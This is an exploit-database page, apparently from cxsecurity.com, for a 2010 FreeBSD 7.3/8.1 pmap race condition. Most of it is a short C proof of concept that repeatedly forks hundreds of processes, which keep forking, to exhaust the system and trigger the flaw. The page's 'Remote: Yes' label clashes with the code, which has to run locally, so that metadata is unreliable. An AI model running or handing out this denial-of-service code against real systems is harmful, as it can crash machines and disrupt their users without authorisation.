FreeBSD 7.3/8.1 pmap race condition PoC

2010.09.06
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/* FreeBSD 7.3/8.1 pmap race condition PoC Credit: Maksymilian Arciemowicz */ #include <stdio.h> #include <sys/types.h> #include <unistd.h> void newproc(){ again: fork(); sleep(3600*24); goto again; } void runfork(){ pid_t adr; if(0!=(adr=fork())) printf("fork not zero\n"); else { printf("fork zero\n"); newproc(); } } int main(){ int secdel=5; int dev; // clock with (int)secdel secound frequency while(1){ printf("sleep %i sec\n",secdel); sleep(secdel); printf("weak up\n"); // create 512 processes dev=512; while(dev--) runfork(); } return 0; }

References:

http://cxsecurity.com/issue/WLB-2010090156


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top